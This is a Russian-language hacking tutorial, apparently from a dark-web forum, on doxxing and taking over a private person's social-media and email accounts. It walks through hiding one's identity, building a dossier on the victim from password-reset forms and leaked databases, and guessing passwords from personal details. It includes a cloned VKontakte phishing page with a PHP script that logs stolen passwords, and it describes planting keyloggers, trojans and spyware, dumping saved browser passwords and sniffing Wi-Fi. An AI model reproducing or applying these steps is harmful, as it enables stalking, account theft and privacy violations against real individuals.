Взлом и пробив человека
Для начала настроим свою анонимность
Если вы не собираетесь взламывать известных личностей, то достаточно будет совершать свои действия с VPS (дедика) либор использовать TOR + VPN. Не заходите во взломанные аккаунты со своего ip.
1) Пользуйтесь VPN сервисами – только платными, только зарубежными (лучше в оффшорах). Следите, чтобы не прерывалось соединение! Люди, которым важна безопасность и анонимность в сети, всегда используют минимум VPN.
Дедики, соксы, прокси, tor и т.п. – это скорее дополнительные инструменты для определенных задач. То есть вашу деятельность не увидит никто, так как соединение шифруется (кроме самого сервиса ВПН, конечно).
2) Лучше всего использовать браузер TOR, так как он заточен под скрытную работу в сети. Tor скроет вашу личности в Сети, скроет всё то, что выделали в Интернете и куда ходили.
Но даже используя Tor, всё-таки надо соблюдать несколько правил и немного разобраться в том, как он работает, что он умеет и чего он не может, чтобы не сводить на “нет” все его усилия. Если вы используете TorBrowser и при этом логинитесь в FaceBook, дела ваши плохи.
Поймите, как он работает и пользуйтесь им грамотно. Здесь используется шифрование в 3 “слоя”, информация передается по 3 цепочкам.
3) Никаких российских почтовых серверов (mail, yandex и т.д.). Никогда не используйте свои данные для любых регистраций. С радостью сольют о вас всю инфу.
Взлом
Взлом аккаунта возможен в двух вариантах: удаленно, локально.
Разложим весь процесс на несколько этапов.
I) Сбор информации о человеке
На этом этапе мы создадим текстовый документ (txt, doc), в который будем записывать все данные человека aka досье. Рассмотрим несколько возможных вариантов наличия исходных данных: имеется только URL человека, только номер, только почта, только имя и фамилия.
A. Имеется только URL
1) Анализ и поиск.
Сохраняем ID или же буквенную замену, если она есть.
Сохраняем все данные о человеке со страницы: имя, фамилию, возраст, дату рождения, город, ники аккаунтов соц. сетей, имя девушки/парня, фамилию матери, кличку животного, хобби, игры, машину. Стараемся максимально изучить человека по фото, группам и тд и записывают все нужную информацию.
Ищем в поиске всю информацию о человеке. Вбиваем имя, фамилию, город.
Находим аккаунты в других сетях, в mail.ru и любую другую информацию по школу/ВЕЗу. Например, в mail.ru в окне браузера вверху есть ссылка “Люди”. Нажмите на неё, над ссылкой откроется строка “Поиск людей”, поля: “Имя”, “Фамилия”, кнопка “Найти”. Заполняем поля, жмем кнопку “Найти”. Сохраняем то, что считаем нужным.
2) Поиск почты.
Найдем почту жертвы, если ее не нашли в гугле в предыдущем пункте. Если есть аккаунт в моем мире на mail.ru, то смотрим URL страницы человека. Там будет запись вида http://my.mail.ru/people. Значит почта будет выглядеть [email protected].
Изучаем аккаунты соцсетей. Внимательно смотрим Instagram, twitter, facebook и прочие. Через форму восстановления можем узнать часть почты.
Почта есть. Ищем информацию по почте. Вбиваем в гугл, вбиваем в поиске в FaceBook. Пользуемся формой восстановления пароля в соцсетях и узнаем часть информации. Находим дополнительные аккаунты и т.п.
3) Поиск Телефона.
Телефон может быть опубликован на странице человека. Если нет, то попытаемся узнать через форму восстановления ВКонтакте, в mail.ru, FaceBook. При восстановлении по почте показывает часть номера. При восстановлении ВКонтакте-другую часть. Теперь будет не хватать только пары цифр, которые будем выяснять с помощью перебора.
4) Поиск по базам.
Если же не нашли ни почту, ни телефон, а если даже и нашли, то смотрим в базах аккаунтов. Выполняем поиск по имени, фамилии, почте, телефону. Очень часто выкладывают ан разные раздачи крупные базы аккаунтов/номеров.
B. Имеется только номер
1) Ищем информацию по номеру телефона в различных сервисах.
Узнаем данные жертвы
2) Ищем в гугле
3) Восстанавливаем пароль по номеру телефона в различных соцсетях и узнаем часть информации.
Например, в FaceBook можем увидеть часть почты и ау.
4) Добавляем номер в свои контакты и смотрим в Instagram в предложениях подписки должен появится этот человек. Заходим в различные мессенджеры и смотрим информацию по контакту.
5) Повторяем 4 пункт из A. Поиск по базам. Выполняем поиск по имени, фамилии, почте, телефону. Очень часто выкладывают на раздачи крупные базы, которые вы можете найти в нашей группе.
6) Как нашли информацию, повторяем пункты из раздела А.
C. Имеется только почта
1) Ищем всю информацию и аккаунты по почте по пункту 2,4 раздела А.
2) Как нашли информацию, повторяем пункты из раздела А, В.
D. Имеются только фамилия и имя
1) Ищем в гугле примерные аккаунты. Анализируем все данные и отсеиваем ненужных людей.
2) Повторяем 4 пункт из А. Поиск по базам.
3) Как нашли информацию, повторяем пункты из раздела А, В.
II Получаем доступ к аккаунту
1. Подбор пароля.
Здесь применяем всю информацию, которую мы записывали о человеке в блокнот.
Интересное исследование со слива паролей популярного сервиса.
Большая часть паролей 6-8 символов. В большинстве случаем это были только буквы в маленьком регистре, либо буквы с цифрами.
* Узнайте имя, ник, хобби, любимую спортивную команду, любимую еду, словом всё, что вы можете узнать о жертве, что возможно будет отображаться в её парол
* Дни рождения, имена домашних питомцев, имена членов семьи, друзей.
Из этих данных будем генерировать возможные пароли. Не составляйте слишком большой список с ненужными паролями. Существует много инструментов для генерации паролей.
Для Windows используйте онлайн сервисы.
2. Получаем доступ к почте.
Как известно, большинство использует одинаковые пароли в различных сервисах.
Перебором пароля пробуем зайти в почту. Если не получилось, то восстанавливаем доступ к почте, отвечая на контрольные вопросы.
После получения доступа выполняем поиск в почте по слово “пароль” и используем его для входа в аккаунт. Либо просто анализируем письма человека и ищем вручную.
3. Фишинг
Для качественного подброса фишинга и для более детального изучения страницы можно использовать сервис http://vk.city4me.com . Также можете посмотреть комментарии в группах, для того, чтобы знать, чем интересуется и в каком направлении применять СИ (социальную инженерию). Приведу примитивный и простой пример.
Для начала регистрируем домен. Можно воспользоваться бесплатными регистраторами, например, http://freenom.com . Выбираем домен похожий на vkcom , либо на URL жертвы com_id12345.ru .
Далее создаем страницу по типу vk.com_id12345.ru или оставляем vkcom.
Далее ищем хостинг, например, Hostinger и прикрепляем домен (прописываем ns).
Теперь нужно создать страницу как ВКонтакте. Воспользуемся данными сервисами и скопируем страницу со стилями и скриптами.
Например, на Hostinger в раздел public_html и удаляем файл index.html.
При переходе на наш сайт получаем это:
Далее необходимо сделать так, чтобы веденные данные сохранялись у нас.
Открываем код страницы. Ищем поля ввода логина и пароля:
<input type=”text” name=”email” …..
<input type=”password” name=”pass” ……
Здесь нужно обратить внимание на именя ПОЛЕЙ
Это name=”email”;
И name=”pass”;
Удаляем в строчке все что после этих имен до скобок />
Пишем скрипт для сохранения логина и пароля. Создаем файл с названием login.php и вставляем код:
<?php
$f=fopen(“pass.log”,”at”);
flock($f,2);
fputs($f,”password: “.$_POST[‘pass’].”\n”.”—————\n”);
flock($f);
?>
<script>
document.location.href=”http://vk.com“;
</script>
$_POST[‘login’]
$_POST[‘passw’] – это поля которые мы будем сохранять.
Т.е. у нас в файле index.html (имена) мы их сюда вписываем.
pass.log – файл куда будем сохранять апроли.
<script> document.location.href”http://vk.com“;</script>
-vk.com это адрес куда перенаправят юзера после сохранения пароля
Остается лишь отправить ссылку на неё жертве на почту/лс с просьбой “оценить фото”, “ознакомиться с коммерческим предложением” и т.д.
4. Вирус
Еще один вариант – установка на компьютер знакомого кейлоггеров, троянских программ для хищения данных, расширений для браузеров, получающих конфиденциальную информацию.
Как самый простой вариант – спрятать в другой файл или под видос картинки скинуть жертве и заставить открыть. Для этого используем социальную инженерию.
Для пользователей Android также можно воспользоваться шпионскими программами.
Установленные на телефон жертвы – они позволяют получить сведения об активности (логинах, паролях и т.д.) пользователя. При этом, многие просто не считают нужным защищать гаджеты антивирусами и антишпионским софтом, который мог бы этому воспрепятствовать.
Локальный взлом.
Это подходить для тех, у кого есть доступ к компьютеру, телефону, сети Wi-Fi.
a. Чтобы получить доступ к компьютеру скачиваете на флешку те же самые вирусы. Пока жертва не видит, либо замаскировав под другую программу/фото, устанавливаете на компьютер. Получаете логины и пароли, куки, файлы и так далее. Проверяете их на наличие на своем компьютере дома.
b. Также можно посмотреть пароль страницы ВКонтакте, либо любые другие пароли (ведь большинство использует одинаковые пароли везде). Если он использует браузер хром или яндекс, то там все однотипно. Для этого заходим в Настройки->Показать дополнительные настройки, “Пароли и формы”->”Предлагать сохранять пароли для формы, настроить”
Или просто забить это в адресную строку хрома chrome://settings/passwords . Должен отобразится список всех сохраненных паролей со всех сайтов на которых он прошел регистрацию.
c. Заходим в браузер. Нажимаем кнопку Выйти из контакта, и видим два знакомых каждому поля. Первое поле это логин. Второе это пароль. Поскольку логин не скрыт, о нем нечего рассказать. Но в поле пароль можно использовать небольшую хитрость. А именно правым щелчком мыши на поле пароль выбрать Посмотреть кол.
И вы увидите следующую строку:
<input type=”password” name=”pass” class=”text” id=”quick_pass” onkeyup=”toogle(‘quick_expire’, !!this.valie);toogle(‘quick_forgot’, !this.value)”>
Кликните двойным щелчком по надписи type=”password” и слово password заменить на что угодно, или совсем его сотрите. Нажмите Enter и все. Пароль от контакта больше не скрыт.
d. Для этого способа также необходимо находится за компьютером того, чей пароль хотим украсть. Опять же рассматриваем на примере браузера хром, главное уловить саму идею. В браузере яндекса можно проделать то же самое.
Наверняка есть те, кому известна система “Учетных записей гугл”. А именно, в правом верхнем углу браузера есть вкладка
Нажав на которую, выпадает меню. Выбираем “Войти в хром”
И создаете новый Аккаунт:
Создаете нового пользователя, в качестве пароля можете использовать самый простой. После чего, заходите в хром уже со своего компьютера. Вводите созданные Логин и Пароль. Все сохраненные пароли, формы автозаполнения, даже история просмотров – всё оказывается на вашем компьютере.
e. ЕСли есть доступ к мобильному телефону жертвы, можно использовать несколько более изящных способов взлома. Самый простой – запрос на получение нового пароля на телефон.
С мобильного телефона можно получить доступ к облачным хранилищам данных (такое использует, например, GoogleChrome), где есть все пароли пользователя, которые он синхронизирует на разных устройствах. Точно такой же способ, что описан в пункте d.
f. Имея доступ к одной Wi-Fi сети, можете снифать трафик и перехватить пароли, либо попробуйте взломать домашнюю сеть Wi-Fi человека и перехватить его данные.
SAMURAI – ВЗЛОМ! ЛУЧШЕЕ КАЧЕСТВО В СНГ И ЗА ЕГО ПРЕДЕЛАМИ!
https://darkwebs.cc/threads/97670/